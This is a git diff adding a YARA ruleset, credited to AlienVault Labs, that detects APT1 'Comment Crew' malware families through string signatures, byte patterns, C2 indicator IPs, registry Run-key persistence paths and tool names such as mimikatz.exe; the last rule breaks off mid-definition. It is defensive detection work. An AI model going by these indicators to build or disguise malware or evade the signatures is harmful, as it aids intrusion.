diff --git a/malware/APT1.yar b/malware/APT1.yar
new file mode 100644
index 0000000..dbf3d38
--- /dev/null
+++ b/malware/APT1.yar
@@ -0,0 +1,1172 @@
+/*
+ This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule LIGHTDART_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "ret.log" wide ascii
+ $s2 = "Microsoft Internet Explorer 6.0" wide ascii
+ $s3 = "szURL Fail" wide ascii
+ $s4 = "szURL Successfully" wide ascii
+ $s5 = "%s&sdate=%04ld-%02ld-%02ld" wide ascii
+ condition:
+ all of them
+}
+
+rule AURIGA_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "superhard corp." wide ascii
+ $s2 = "microsoft corp." wide ascii
+ $s3 = "[Insert]" wide ascii
+ $s4 = "[Delete]" wide ascii
+ $s5 = "[End]" wide ascii
+ $s6 = "!(*@)(!@KEY" wide ascii
+ $s7 = "!(*@)(!@SID=" wide ascii
+ condition:
+ all of them
+}
+
+rule AURIGA_driver_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Services\\riodrv32" wide ascii
+ $s2 = "riodrv32.sys" wide ascii
+ $s3 = "svchost.exe" wide ascii
+ $s4 = "wuauserv.dll" wide ascii
+ $s5 = "arp.exe" wide ascii
+ $pdb = "projects\\auriga" wide ascii
+
+ condition:
+ all of ($s*) or $pdb
+}
+
+rule BANGAT_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "superhard corp." wide ascii
+ $s2 = "microsoft corp." wide ascii
+ $s3 = "[Insert]" wide ascii
+ $s4 = "[Delete]" wide ascii
+ $s5 = "[End]" wide ascii
+ $s6 = "!(*@)(!@KEY" wide ascii
+ $s7 = "!(*@)(!@SID=" wide ascii
+ $s8 = "end binary output" wide ascii
+ $s9 = "XriteProcessMemory" wide ascii
+ $s10 = "IE:Password-Protected sites" wide ascii
+ $s11 = "pstorec.dll" wide ascii
+
+ condition:
+ all of them
+}
+
+rule BISCUIT_GREENCAT_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "zxdosml" wide ascii
+ $s2 = "get user name error!" wide ascii
+ $s3 = "get computer name error!" wide ascii
+ $s4 = "----client system info----" wide ascii
+ $s5 = "stfile" wide ascii
+ $s6 = "cmd success!" wide ascii
+
+ condition:
+ all of them
+}
+
+rule BOUNCER_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "*Qd9kdgba33*%Wkda0Qd3kvn$*&><(*&%$E#%$#1234asdgKNAg@!gy565dtfbasdg" wide ascii
+ $s2 = "IDR_DATA%d" wide ascii
+
+ $s3 = "asdfqwe123cxz" wide ascii
+ $s4 = "Mode must be 0(encrypt) or 1(decrypt)." wide ascii
+
+ condition:
+ ($s1 and $s2) or ($s3 and $s4)
+
+}
+
+rule BOUNCER_DLL_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "new_connection_to_bounce():" wide ascii
+ $s2 = "usage:%s IP port [proxip] [port] [key]" wide ascii
+
+ condition:
+ all of them
+}
+
+rule CALENDAR_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "content" wide ascii
+ $s2 = "title" wide ascii
+ $s3 = "entry" wide ascii
+ $s4 = "feed" wide ascii
+ $s5 = "DownRun success" wide ascii
+ $s6 = "%s@gmail.com" wide ascii
+ $s7 = "<!--%s-->" wide ascii
+
+ $b8 = "W4qKihsb+So=" wide ascii
+ $b9 = "PoqKigY7ggH+VcnqnTcmhFCo9w==" wide ascii
+ $b10 = "8oqKiqb5880/uJLzAsY=" wide ascii
+
+ condition:
+ all of ($s*) or all of ($b*)
+}
+
+rule COMBOS_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Mozilla4.0 (compatible; MSIE 7.0; Win32)" wide ascii
+ $s2 = "Mozilla5.1 (compatible; MSIE 8.0; Win32)" wide ascii
+ $s3 = "Delay" wide ascii
+ $s4 = "Getfile" wide ascii
+ $s5 = "Putfile" wide ascii
+ $s6 = "---[ Virtual Shell]---" wide ascii
+ $s7 = "Not Comming From Our Server %s." wide ascii
+
+
+ condition:
+ all of them
+}
+
+rule DAIRY_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Mozilla/4.0 (compatible; MSIE 7.0;)" wide ascii
+ $s2 = "KilFail" wide ascii
+ $s3 = "KilSucc" wide ascii
+ $s4 = "pkkill" wide ascii
+ $s5 = "pklist" wide ascii
+
+
+ condition:
+ all of them
+}
+
+rule GLOOXMAIL_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Kill process success!" wide ascii
+ $s2 = "Kill process failed!" wide ascii
+ $s3 = "Sleep success!" wide ascii
+ $s4 = "based on gloox" wide ascii
+
+ $pdb = "glooxtest.pdb" wide ascii
+
+ condition:
+ all of ($s*) or $pdb
+}
+
+rule GOGGLES_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Kill process success!" wide ascii
+ $s2 = "Kill process failed!" wide ascii
+ $s3 = "Sleep success!" wide ascii
+ $s4 = "based on gloox" wide ascii
+
+ $pdb = "glooxtest.pdb" wide ascii
+
+ condition:
+ all of ($s*) or $pdb
+}
+
+rule HACKSFASE1_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = {cb 39 82 49 42 be 1f 3a}
+
+ condition:
+ all of them
+}
+
+rule HACKSFASE2_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Send to Server failed." wide ascii
+ $s2 = "HandShake with the server failed. Error:" wide ascii
+ $s3 = "Decryption Failed. Context Expired." wide ascii
+
+ condition:
+ all of them
+}
+
+rule KURTON_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Mozilla/4.0 (compatible; MSIE8.0; Windows NT 5.1)" wide ascii
+ $s2 = "!(*@)(!@PORT!(*@)(!@URL" wide ascii
+ $s3 = "MyTmpFile.Dat" wide ascii
+ $s4 = "SvcHost.DLL.log" wide ascii
+
+ condition:
+ all of them
+}
+
+rule LONGRUN_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0; Trident/4.0)" wide ascii
+ $s2 = "%s\\%c%c%c%c%c%c%c" wide ascii
+ $s3 = "wait:" wide ascii
+ $s4 = "Dcryption Error! Invalid Character" wide ascii
+
+ condition:
+ all of them
+}
+
+rule MACROMAIL_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "svcMsn.dll" wide ascii
+ $s2 = "RundllInstall" wide ascii
+ $s3 = "Config service %s ok." wide ascii
+ $s4 = "svchost.exe" wide ascii
+
+ condition:
+ all of them
+}
+
+rule MANITSME_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Install an Service hosted by SVCHOST." wide ascii
+ $s2 = "The Dll file that to be released." wide ascii
+ $s3 = "SYSTEM\\CurrentControlSet\\Services\\" wide ascii
+ $s4 = "svchost.exe" wide ascii
+
+ $e1 = "Man,it's me" wide ascii
+ $e2 = "Oh,shit" wide ascii
+ $e3 = "Hallelujah" wide ascii
+ $e4 = "nRet == SOCKET_ERROR" wide ascii
+
+ $pdb1 = "rouji\\release\\Install.pdb" wide ascii
+ $pdb2 = "rouji\\SvcMain.pdb" wide ascii
+
+ condition:
+ (all of ($s*)) or (all of ($e*)) or $pdb1 or $pdb2
+}
+
+rule MINIASP_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "miniasp" wide ascii
+ $s2 = "wakeup=" wide ascii
+ $s3 = "download ok!" wide ascii
+ $s4 = "command is null!" wide ascii
+ $s5 = "device_input.asp?device_t=" wide ascii
+
+
+ condition:
+ all of them
+}
+
+rule NEWSREELS_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "Mozilla/4.0 (compatible; Windows NT 5.1; MSIE 7.0)" wide ascii
+ $s2 = "name=%s&userid=%04d&other=%c%s" wide ascii
+ $s3 = "download ok!" wide ascii
+ $s4 = "command is null!" wide ascii
+ $s5 = "noclient" wide ascii
+ $s6 = "wait" wide ascii
+ $s7 = "active" wide ascii
+ $s8 = "hello" wide ascii
+
+
+ condition:
+ all of them
+}
+
+rule SEASALT_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; Windows 98) KSMM" wide ascii
+ $s2 = "upfileok" wide ascii
+ $s3 = "download ok!" wide ascii
+ $s4 = "upfileer" wide ascii
+ $s5 = "fxftest" wide ascii
+
+
+ condition:
+ all of them
+}
+
+
+rule STARSYPOUND_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "*(SY)# cmd" wide ascii
+ $s2 = "send = %d" wide ascii
+ $s3 = "cmd.exe" wide ascii
+ $s4 = "*(SY)#" wide ascii
+
+
+ condition:
+ all of them
+}
+
+rule SWORD_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "@***@*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>>>" wide ascii
+ $s2 = "sleep:" wide ascii
+ $s3 = "down:" wide ascii
+ $s4 = "*========== Bye Bye ! ==========*" wide ascii
+
+
+ condition:
+ all of them
+}
+
+
+rule thequickbrow_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "thequickbrownfxjmpsvalzydg" wide ascii
+
+
+ condition:
+ all of them
+}
+
+
+rule TABMSGSQL_APT1 {
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "letusgohtppmmv2.0.0.1" wide ascii
+ $s2 = "Mozilla/4.0 (compatible; )" wide ascii
+ $s3 = "filestoc" wide ascii
+ $s4 = "filectos" wide ascii
+ $s5 = "reshell" wide ascii
+
+ condition:
+ all of them
+}
+
+rule CCREWBACK1
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "postvalue" wide ascii
+ $b = "postdata" wide ascii
+ $c = "postfile" wide ascii
+ $d = "hostname" wide ascii
+ $e = "clientkey" wide ascii
+ $f = "start Cmd Failure!" wide ascii
+ $g = "sleep:" wide ascii
+ $h = "downloadcopy:" wide ascii
+ $i = "download:" wide ascii
+ $j = "geturl:" wide ascii
+ $k = "1.234.1.68" wide ascii
+
+ condition:
+ 4 of ($a,$b,$c,$d,$e) or $f or 3 of ($g,$h,$i,$j) or $k
+}
+
+rule TrojanCookies_CCREW
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "sleep:" wide ascii
+ $b = "content=" wide ascii
+ $c = "reqpath=" wide ascii
+ $d = "savepath=" wide ascii
+ $e = "command=" wide ascii
+
+
+ condition:
+ 4 of ($a,$b,$c,$d,$e)
+}
+
+rule GEN_CCREW1
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "W!r@o#n$g" wide ascii
+ $b = "KerNel32.dll" wide ascii
+
+ condition:
+ any of them
+}
+
+rule Elise
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "SetElise.pdb" wide ascii
+
+ condition:
+ $a
+}
+
+rule EclipseSunCloudRAT
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "Eclipse_A" wide ascii
+ $b = "\\PJTS\\" wide ascii
+ $c = "Eclipse_Client_B.pdb" wide ascii
+ $d = "XiaoME" wide ascii
+ $e = "SunCloud-Code" wide ascii
+ $f = "/uc_server/data/forum.asp" wide ascii
+
+ condition:
+ any of them
+}
+
+rule MoonProject
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "Serverfile is smaller than Clientfile" wide ascii
+ $b = "\\M tools\\" wide ascii
+ $c = "MoonDLL" wide ascii
+ $d = "\\M tools\\" wide ascii
+
+ condition:
+ any of them
+}
+
+rule ccrewDownloader1
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = {DD B5 61 F0 20 47 20 57 D6 65 9C CB 31 1B 65 42}
+
+ condition:
+ any of them
+}
+
+rule ccrewDownloader2
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "3gZFQOBtY3sifNOl" wide ascii
+ $b = "docbWUWsc2gRMv9HN7TFnvnKcrWUUFdAEem9DkqRALoD" wide ascii
+ $c = "6QVSOZHQPCMc2A8HXdsfuNZcmUnIqWrOIjrjwOeagILnnScxadKEr1H2MZNwSnaJ" wide ascii
+
+ condition:
+ any of them
+}
+
+
+rule ccrewMiniasp
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "MiniAsp.pdb" wide ascii
+ $b = "device_t=" wide ascii
+
+ condition:
+ any of them
+}
+
+
+rule ccrewSSLBack2
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = {39 82 49 42 BE 1F 3A}
+
+ condition:
+ any of them
+}
+
+rule ccrewSSLBack3
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "SLYHKAAY" wide ascii
+
+ condition:
+ any of them
+}
+
+
+rule ccrewSSLBack1
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "!@#%$^#@!" wide ascii
+ $b = "64.91.80.6" wide ascii
+
+ condition:
+ any of them
+}
+
+rule ccrewDownloader3
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "ejlcmbv" wide ascii
+ $b = "bhxjuisv" wide ascii
+ $c = "yqzgrh" wide ascii
+ $d = "uqusofrp" wide ascii
+ $e = "Ljpltmivvdcbb" wide ascii
+ $f = "frfogjviirr" wide ascii
+ $g = "ximhttoskop" wide ascii
+ condition:
+ 4 of them
+}
+
+
+rule ccrewQAZ
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "!QAZ@WSX" wide ascii
+
+ condition:
+ $a
+}
+
+rule metaxcd
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "<meta xcd=" wide ascii
+
+ condition:
+ $a
+}
+
+rule MiniASP
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+strings:
+ $KEY = { 71 30 6E 63 39 77 38 65 64 61 6F 69 75 6B 32 6D 7A 72 66 79 33 78 74 31 70 35 6C 73 36 37 67 34 62 76 68 6A }
+ $PDB = "MiniAsp.pdb" nocase wide ascii
+
+condition:
+ any of them
+}
+
+rule DownloaderPossibleCCrew
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $a = "%s?%.6u" wide ascii
+ $b = "szFileUrl=%s" wide ascii
+ $c = "status=%u" wide ascii
+ $d = "down file success" wide ascii
+ $e = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)" wide ascii
+
+ condition:
+ all of them
+}
+
+rule APT1_MAPIGET
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "%s\\Attachment.dat" wide ascii
+ $s2 = "MyOutlook" wide ascii
+ $s3 = "mail.txt" wide ascii
+ $s4 = "Recv Time:" wide ascii
+ $s5 = "Subject:" wide ascii
+
+ condition:
+ all of them
+}
+
+rule APT1_LIGHTBOLT
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $str1 = "bits.exe" wide ascii
+ $str2 = "PDFBROW" wide ascii
+ $str3 = "Browser.exe" wide ascii
+ $str4 = "Protect!" wide ascii
+ condition:
+ 2 of them
+}
+
+rule APT1_GETMAIL
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $stra1 = "pls give the FULL path" wide ascii
+ $stra2 = "mapi32.dll" wide ascii
+ $stra3 = "doCompress" wide ascii
+
+ $strb1 = "getmail.dll" wide ascii
+ $strb2 = "doCompress" wide ascii
+ $strb3 = "love" wide ascii
+ condition:
+ all of ($stra*) or all of ($strb*)
+}
+
+rule APT1_GDOCUPLOAD
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $str1 = "name=\"GALX\"" wide ascii
+ $str2 = "User-Agent: Shockwave Flash" wide ascii
+ $str3 = "add cookie failed..." wide ascii
+ $str4 = ",speed=%f" wide ascii
+ condition:
+ 3 of them
+}
+
+rule APT1_WEBC2_Y21K
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "Y29ubmVjdA" wide ascii // connect
+ $2 = "c2xlZXA" wide ascii // sleep
+ $3 = "cXVpdA" wide ascii // quit
+ $4 = "Y21k" wide ascii // cmd
+ $5 = "dW5zdXBwb3J0" wide ascii // unsupport
+ condition:
+ 4 of them
+}
+
+rule APT1_WEBC2_YAHOO
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $http1 = "HTTP/1.0" wide ascii
+ $http2 = "Content-Type:" wide ascii
+ $uagent = "IPHONE8.5(host:%s,ip:%s)" wide ascii
+ condition:
+ all of them
+}
+
+rule APT1_WEBC2_UGX
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $persis = "SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN" wide ascii
+ $exe = "DefWatch.exe" wide ascii
+ $html = "index1.html" wide ascii
+ $cmd1 = "!@#tiuq#@!" wide ascii
+ $cmd2 = "!@#dmc#@!" wide ascii
+ $cmd3 = "!@#troppusnu#@!" wide ascii
+ condition:
+ 3 of them
+}
+
+rule APT1_WEBC2_TOCK
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "InprocServer32" wide ascii
+ $2 = "HKEY_PERFORMANCE_DATA" wide ascii
+ $3 = "<!---[<if IE 5>]id=" wide ascii
+ condition:
+ all of them
+}
+
+rule APT1_WEBC2_TABLE
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $msg1 = "Fail To Execute The Command" wide ascii
+ $msg2 = "Execute The Command Successfully" wide ascii
+ /*
+ $gif1 = /\w+\.gif/
+ */
+ $gif2 = "GIF89" wide ascii
+ condition:
+ 3 of them
+}
+
+rule APT1_WEBC2_RAVE
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "iniet.exe" wide ascii
+ $2 = "cmd.exe" wide ascii
+ $3 = "SYSTEM\\CurrentControlSet\\Services\\DEVFS" wide ascii
+ $4 = "Device File System" wide ascii
+ condition:
+ 3 of them
+}
+
+rule APT1_WEBC2_QBP
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "2010QBP" wide ascii
+ $2 = "adobe_sl.exe" wide ascii
+ $3 = "URLDownloadToCacheFile" wide ascii
+ $4 = "dnsapi.dll" wide ascii
+ $5 = "urlmon.dll" wide ascii
+ condition:
+ 4 of them
+}
+
+rule APT1_WEBC2_HEAD
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "Ready!" wide ascii
+ $2 = "connect ok" wide ascii
+ $3 = "WinHTTP 1.0" wide ascii
+ $4 = "<head>" wide ascii
+ condition:
+ all of them
+}
+
+rule APT1_WEBC2_GREENCAT
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "reader_sl.exe" wide ascii
+ $2 = "MS80547.bat" wide ascii
+ $3 = "ADR32" wide ascii
+ $4 = "ControlService failed!" wide ascii
+ condition:
+ 3 of them
+}
+
+rule APT1_WEBC2_DIV
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "3DC76854-C328-43D7-9E07-24BF894F8EF5" wide ascii
+ $2 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run" wide ascii
+ $3 = "Hello from MFC!" wide ascii
+ $4 = "Microsoft Internet Explorer" wide ascii
+ condition:
+ 3 of them
+}
+
+rule APT1_WEBC2_CSON
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $httpa1 = "/Default.aspx?INDEX=" wide ascii
+ $httpa2 = "/Default.aspx?ID=" wide ascii
+ $httpb1 = "Win32" wide ascii
+ $httpb2 = "Accept: text*/*" wide ascii
+ $exe1 = "xcmd.exe" wide ascii
+ $exe2 = "Google.exe" wide ascii
+ condition:
+ 1 of ($exe*) and 1 of ($httpa*) and all of ($httpb*)
+}
+
+rule APT1_WEBC2_CLOVER
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $msg1 = "BUILD ERROR!" wide ascii
+ $msg2 = "SUCCESS!" wide ascii
+ $msg3 = "wild scan" wide ascii
+ $msg4 = "Code too clever" wide ascii
+ $msg5 = "insufficient lookahead" wide ascii
+ $ua1 = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; SV1)" wide ascii
+ $ua2 = "Mozilla/5.0 (Windows; Windows NT 5.1; en-US; rv:1.8.0.12) Firefox/1.5.0.12" wide ascii
+ condition:
+ 2 of ($msg*) and 1 of ($ua*)
+}
+
+rule APT1_WEBC2_BOLID
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $vm = "VMProtect" wide ascii
+ $http = "http://[c2_location]/[page].html" wide ascii
+ condition:
+ all of them
+}
+
+rule APT1_WEBC2_ADSPACE
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "<!---HEADER ADSPACE style=" wide ascii
+ $2 = "ERSVC.DLL" wide ascii
+ condition:
+ all of them
+}
+
+rule APT1_WEBC2_AUSOV
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "ntshrui.dll" wide ascii
+ $2 = "%SystemRoot%\\System32\\" wide ascii
+ $3 = "<!--DOCHTML" wide ascii
+ $4 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" wide ascii
+ $5 = "Ausov" wide ascii
+ condition:
+ 4 of them
+}
+
+rule APT1_WARP
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $err1 = "exception..." wide ascii
+ $err2 = "failed..." wide ascii
+ $err3 = "opened..." wide ascii
+ $exe1 = "cmd.exe" wide ascii
+ $exe2 = "ISUN32.EXE" wide ascii
+ condition:
+ 2 of ($err*) and all of ($exe*)
+}
+
+rule APT1_TARSIP_ECLIPSE
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $1 = "\\pipe\\ssnp" wide ascii
+ $2 = "toobu.ini" wide ascii
+ $3 = "Serverfile is not bigger than Clientfile" wide ascii
+ $4 = "URL download success" wide ascii
+ condition:
+ 3 of them
+}
+
+rule APT1_TARSIP_MOON
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $s1 = "\\XiaoME\\SunCloud-Code\\moon" wide ascii
+ $s2 = "URL download success!" wide ascii
+ $s3 = "Kugoosoft" wide ascii
+ $msg1 = "Modify file failed!! So strange!" wide ascii
+ $msg2 = "Create cmd process failed!" wide ascii
+ $msg3 = "The command has not been implemented!" wide ascii
+ $msg4 = "Runas success!" wide ascii
+ $onec1 = "onec.php" wide ascii
+ $onec2 = "/bin/onec" wide ascii
+ condition:
+ 1 of ($s*) and 1 of ($msg*) and 1 of ($onec*)
+}
+
+rule APT1_payloads
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $pay1 = "rusinfo.exe" wide ascii
+ $pay2 = "cmd.exe" wide ascii
+ $pay3 = "AdobeUpdater.exe" wide ascii
+ $pay4 = "buildout.exe" wide ascii
+ $pay5 = "DefWatch.exe" wide ascii
+ $pay6 = "d.exe" wide ascii
+ $pay7 = "em.exe" wide ascii
+ $pay8 = "IMSCMig.exe" wide ascii
+ $pay9 = "localfile.exe" wide ascii
+ $pay10 = "md.exe" wide ascii
+ $pay11 = "mdm.exe" wide ascii
+ $pay12 = "mimikatz.exe" wide ascii
+ $pay13 = "msdev.exe" wide ascii
+ $pay14 = "ntoskrnl.exe" wide ascii
+ $pay15 = "p.exe" wide ascii
+ $pay16 = "otepad.exe" wide ascii
+ $pay17 = "reg.exe" wide ascii
+ $pay18 = "regsvr.exe" wide ascii
+ $pay19 = "runinfo.exe" wide ascii
+ $pay20 = "AdobeUpdate.exe" wide ascii
+ $pay21 = "inetinfo.exe" wide ascii
+ $pay22 = "svehost.exe" wide ascii
+ $pay23 = "update.exe" wide ascii
+ $pay24 = "NTLMHash.exe" wide ascii
+ $pay25 = "wpnpinst.exe" wide ascii
+ $pay26 = "WSDbg.exe" wide ascii
+ $pay27 = "xcmd.exe" wide ascii
+ $pay28 = "adobeup.exe" wide ascii
+ $pay29 = "0830.bin" wide ascii
+ $pay30 = "1001.bin" wide ascii
+ $pay31 = "a.bin" wide ascii
+ $pay32 = "ISUN32.EXE" wide ascii
+ $pay33 = "AcroRD32.EXE" wide ascii
+ $pay34 = "INETINFO.EXE" wide ascii
+ condition:
+ 1 of them
+}
+
+
+rule APT1_RARSilent_EXE_PDF
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $winrar1 = "WINRAR.SFX" wide ascii
+ /*
+ $winrar2 = ";The comment below contains SFX script commands" wide ascii
+ $winrar3 = "Silent=1" wide ascii
+ */
+
+ /*$str1 = /Setup=[\s\w\"]+\.(exe|pdf|doc)/
+ */
+ $str2 = "Steup=\"" wide ascii
+ condition:
+ all of ($winrar*) and 1 of ($str*)
+}
+
+rule APT1_aspnetreport
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $url = "aspnet_client/report.asp" wide ascii
+ $param = "name=%s&Gender=%c&Random=%04d&SessionKey=%s" wide ascii
+ condition:
+ $url and $param and APT1_payloads
+}
+
+rule APT1_Revird_svc
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $dll1 = "nwwwks.dll" wide ascii
+ $dll2 = "rdisk.dll" wide ascii
+ $dll3 = "skeys.dll" wide ascii
+ $dll4 = "SvcHost.DLL.log" wide ascii
+ $svc1 = "InstallService" wide ascii
+ $svc2 = "RundllInstallA" wide ascii
+ $svc3 = "RundllUninstallA" wide ascii
+ $svc4 = "ServiceMain" wide ascii
+ $svc5 = "UninstallService" wide ascii
+ condition:
+ 1 of ($dll*) and 2 of ($svc*)
+}
+
+rule APT1_dbg_mess
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $dbg1 = "Down file ok!" wide ascii
+ $dbg2 = "Send file ok!" wide ascii
+ $dbg3 = "Command Error!" wide ascii
+ $dbg4 = "Pls choose target first!" wide ascii
+ $dbg5 = "Alert!" wide ascii
+ $dbg6 = "Pls press enter to make sure!" wide ascii
+ $dbg7 = "Are you sure to " wide ascii
+ condition:
+ 4 of them and APT1_payloads
+}
+
+rule APT1_known_malicious_RARSilent
+{
+ meta:
+ author = "AlienVault Labs"
+ info = "CommentCrew-threat-apt1"
+
+ strings:
+ $str1 = "Analysis And Outlook.doc\"" wide ascii
+ $str2 = "North Korean launch.pdf\"" wide ascii
